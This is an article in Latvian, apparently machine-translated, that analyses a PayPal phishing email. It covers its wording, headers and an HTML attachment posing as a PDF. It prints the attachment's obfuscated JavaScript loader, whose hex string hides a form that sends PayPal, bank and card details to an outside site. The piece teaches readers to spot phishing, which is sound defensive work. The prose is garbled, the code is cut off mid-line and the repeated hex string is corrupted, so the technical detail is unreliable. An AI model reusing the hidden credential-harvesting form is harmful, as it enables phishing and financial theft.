Tiešsaistes drošība Pikšķerēšanas e-pasta anatomijas nojaukšana
Mūsdienu pasaulē, kur ikviena informācija ir tiešsaistē, pikšķerēšana ir viens no populārākajiem un postošākajiem tiešsaistes uzbrukumiem, jo jūs vienmēr varat tīrīt vīrusu, bet, ja jūsu bankas dati ir nozagti, jūs esat nepatikšanas. Šeit ir viens no šādiem uzbrukumiem, ko mēs saņēmām.
Nedomāju, ka tas ir svarīgi tikai jūsu bankas rekvizīti: galu galā, ja kāds iegūst kontroli pār jūsu konta pieteikšanos, viņi ne tikai zina šajā kontā ietverto informāciju, bet izredzes ir tādas, ka to pašu pieteikšanās informāciju var izmantot arī citās kontiem. Un, ja viņi apdraud jūsu e-pasta kontu, viņi var atiestatīt visas citas paroles.
Līdz ar to, lai saglabātu spēcīgas un atšķirīgas paroles, jums vienmēr ir jāatrod viltus e-pasta ziņojumi, kas maskējas kā reālā lieta. Lai gan lielākā daļa pikšķerēšanas mēģinājumu ir amatieri, daži ir diezgan pārliecinoši, tāpēc ir svarīgi saprast, kā tos atpazīt virsmas līmenī, kā arī to, kā viņi strādā zem pārsega.
Attēls pēc asirap
Pārbaudīt, kas ir vienkāršā redzējumā
Mūsu piemērs e-pastu, tāpat kā lielākā daļa pikšķerēšanas mēģinājumu, „informē” par jūsu PayPal konta darbību, kas normālos apstākļos būtu satraucošs. Tātad aicinājums rīkoties ir pārbaudīt / atjaunot jūsu kontu, iesniedzot tikai katru personiskās informācijas gabalu, ko jūs varat iedomāties. Atkal, tas ir diezgan skaists.
Kaut arī noteikti ir izņēmumi, diezgan daudz katrs pikšķerēšanas un scam e-pasts tiek tieši ielādēts ar sarkaniem karodziņiem. Pat tad, ja teksts ir pārliecinošs, jūs parasti varat atrast daudzas kļūdas visā ziņojuma struktūrā, kas norāda, ka ziņojums nav leģitīms.
Ziņojuma ķermenis
No pirmā acu uzmetiena tas ir viens no labākajiem pikšķerēšanas e-pastiem, ko esmu redzējis. Nav pareizrakstības vai gramatikas kļūdu un verbija tiek nolasīta saskaņā ar to, ko jūs varētu sagaidīt. Tomēr ir daži sarkani karogi, kurus var redzēt, kad saturu nedaudz vairāk pārbaudāt.
- “Paypal” - pareizais gadījums ir “PayPal” (kapitāla P). Jūs varat redzēt abus variantus, kas tiek izmantoti ziņojumā. Uzņēmumi ir ļoti apzināti ar savu zīmolu, tāpēc tas ir apšaubāms, piemēram, tas izturētu pierādīšanas procesu.
- “Ļaujiet ActiveX” - Cik reizes jūs esat redzējuši likumīgu tīmekļa biznesu, jo Paypal izmērs izmanto patentētu komponentu, kas darbojas tikai vienā pārlūkprogrammā, it īpaši, ja tie atbalsta vairākas pārlūkprogrammas? Protams, kaut kur tur atrodas kāds uzņēmums, bet tas ir sarkans karogs.
- “Droši.” - Ievērojiet, kā šis vārds nesakrīt ar rezerves daļu pārējā rindkopas tekstā. Pat tad, ja es nedaudz vairāk izstiepu logu, tas neaizņem vai nenoslogo.
- „Paypal!” - telpa pirms izsaukuma zīmes izskatās neērti. Tikai vēl viens pārsteigums, ko es esmu pārliecināts, nebūtu leģitīma e-pasta vēstule.
- “PayPal-konta atjaunināšana Form.pdf.htm” - Kāpēc Paypal pievienotu “PDF”, it īpaši, ja viņi varētu vienkārši saiti uz lapu savā vietnē? Turklāt, kāpēc viņi mēģina slēpt HTML failu kā PDF? Tas ir visu to sarkanākais karogs.
Ziņu galvene
Skatoties ziņojuma galvenē, parādās pāris sarkanie karogi:
- No adreses ir [email protected].
- Trūkst adreses. Es to neaizpildīju, tas vienkārši nav daļa no standarta ziņojuma galvenes. Parasti uzņēmums, kuram ir jūsu vārds, personalizēs jums e-pastu.
Pielikums
Atverot pielikumu, varat nekavējoties redzēt, ka izkārtojums nav pareizs, jo trūkst stila informācijas. Atkal, kāpēc PayPal e-pastu HTML veidlapu, ja viņi varētu vienkārši jums saiti savā vietnē?
Piezīme: Lai to izdarītu, mēs izmantojām Gmail iebūvēto HTML pielikumu skatītāju, bet mēs iesakām NEKAD OPEN pielikumus no scammers. Nekad. Kādreiz. Viņi ļoti bieži satur ekspluatāciju, kas datorā instalēs Trojas zirgus, lai nozagtu jūsu konta informāciju.
Ritinot uz leju mazliet vairāk, var redzēt, ka šī veidlapa prasa ne tikai mūsu PayPal pieteikšanās informāciju, bet arī bankas un kredītkaršu informāciju. Daži attēli ir bojāti.
Ir acīmredzams, ka šis pikšķerēšanas mēģinājums ir viss, kas viss notiek ar vienu malu.
Tehniskais sadalījums
Lai gan ir diezgan skaidrs, pamatojoties uz to, kas ir acīmredzams, ka tas ir pikšķerēšanas mēģinājums, mēs tagad sagrupēsim e-pasta tehnisko sastāvu un redzēsim, ko mēs varam atrast.
Informācija no pielikuma
Pirmā lieta, kas jāizskata, ir pielikuma veidlapas HTML avots, kas sniedz datus viltotai vietnei.
Ātri apskatot avotu, visas saites ir derīgas, jo tās norāda uz “paypal.com” vai “paypalobjects.com”, kas ir gan likumīgas.
Tagad mēs apskatīsim dažus pamata informāciju par lapu Firefox apkopo lapā.
Kā redzat, dažas no grafikām tiek izvilktas no domēniem “blessedtobe.com”, “goodhealthpharmacy.com” un “pic-upload.de”, nevis likumīgo PayPal domēnu vietā.
Informācija no e-pasta galvenēm
Tālāk mēs aplūkosim neapstrādāto e-pasta ziņojumu galvenes. Gmail nodrošina šo iespēju, izmantojot ziņojuma izvēlnes opciju Rādīt sākotnējo.
Aplūkojot sākotnējā ziņojuma galvenes informāciju, varat redzēt šo ziņojumu, kas tika veidots, izmantojot programmu Outlook Express 6. Es šaubos, ka PayPal ir kāds personāls, kurš katru no šiem ziņojumiem nosūta manuāli, izmantojot novecojušu e-pasta klientu.
Tagad aplūkojot maršrutēšanas informāciju, var redzēt gan sūtītāja, gan pārsūtīšanas pasta servera IP adresi.
“Lietotāja” IP adrese ir oriģināls sūtītājs. Veicot ātru IP informācijas meklēšanu, mēs varam redzēt, ka sūtīšanas IP ir Vācijā.
Un, aplūkojot pārsūtīšanas pasta servera (mail.itak.at), IP adrese, ko mēs redzam, ir ISP, kas atrodas Austrijā. Es šaubos, ka PayPal savus e-pastus tieši ceļo caur Austrijas ISP, ja viņiem ir liela servera saimniecība, kas varētu viegli apstrādāt šo uzdevumu.
Kur notiek datu pārsūtīšana?
Tāpēc mēs esam skaidri noteikuši, ka tā ir pikšķerēšanas e-pasta adrese, un mēs esam apkopojuši informāciju par to, no kurienes ziņojums ir cēlies, bet gan par to, kur tiek sūtīti dati?
Lai to redzētu, vispirms ir jāsaglabā HTM pielikums, kas jādara mūsu darbvirsmai un jāatver teksta redaktorā. Ritinot to, viss, šķiet, ir kārtībā, izņemot gadījumus, kad mēs nonākam pie aizdomīgiem meklējumiem Javascript blokā.
Mēs redzam, ka ir pilnīgs pēdējās Javascript bloka avots:
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
VAR i, y, x = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; y = "; (i = 0; i
Jebkurā brīdī, kad redzat lielu jumbled virkni šķietami nejaušu burtus un ciparus, kas iestrādāti Javascript blokā, tas parasti ir kaut kas aizdomīgs. Aplūkojot kodu, mainīgais lielums “x” ir iestatīts uz šo lielo virkni un pēc tam dekodēts mainīgajā “y”. Mainīgā “y” galīgais rezultāts pēc tam tiek ierakstīts dokumentā kā HTML.
Tā kā liela virkne ir izgatavota no cipariem 0-9 un burtiem a-f, visticamāk, tā ir kodēta, izmantojot vienkāršu ASCII uz Hex konversiju:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f766572696676e06f6262732f646174612f7665726966792e70687229266676e4
Tulko uz:
Nav nejaušība, ka šī dekodēšana derīgā HTML veidlapas tagā, kas nosūta rezultātus ne PayPal, bet negodīgai vietnei.
Turklāt, apskatot veidlapas HTML avotu, redzēsiet, ka šī veidlapas atzīme nav redzama, jo tā tiek ģenerēta dinamiski, izmantojot Javascript. Tas ir gudrs veids, kā slēpt to, ko HTML faktiski dara, ja kāds vienkārši apskatītu radīto avota avotu (kā mēs to darījām agrāk), nevis pievienojot pielikumu tieši teksta redaktorā.
Ātra whois darbība pārkāpēja vietnē, mēs redzam, ka tas ir domēns, kas tiek uzturēts populārā tīmekļa uzņēmējā, 1 un 1.
Kas izceļas, domēns izmanto lasāmu vārdu (pretstatā tam, kas ir līdzīgs “dfh3sjhskjhw.net”), un domēns ir reģistrēts 4 gadus. Šī iemesla dēļ es uzskatu, ka šis domēns tika nolaupīts un izmantots kā lombards šajā pikšķerēšanas mēģinājumā.
Cinisms ir laba aizsardzība
Kad runa ir par drošību tiešsaistē, tā nekad nav sāpīga, ja ir cinisks.
Lai gan es esmu pārliecināts, ka piemēra e-pastā ir vairāk sarkanu karodziņu, tas, ko esam norādījuši iepriekš, ir rādītāji, kurus mēs redzējām tikai pēc dažām minūtēm. Hipotētiski, ja e-pasta virsmas līmenis atdarināja 100% leģitīmo līdzību, tehniskā analīze joprojām atklās tās patieso dabu. Tieši tāpēc tas importē, lai varētu pārbaudīt gan to, ko jūs varat redzēt, gan to, ko nevarat redzēt.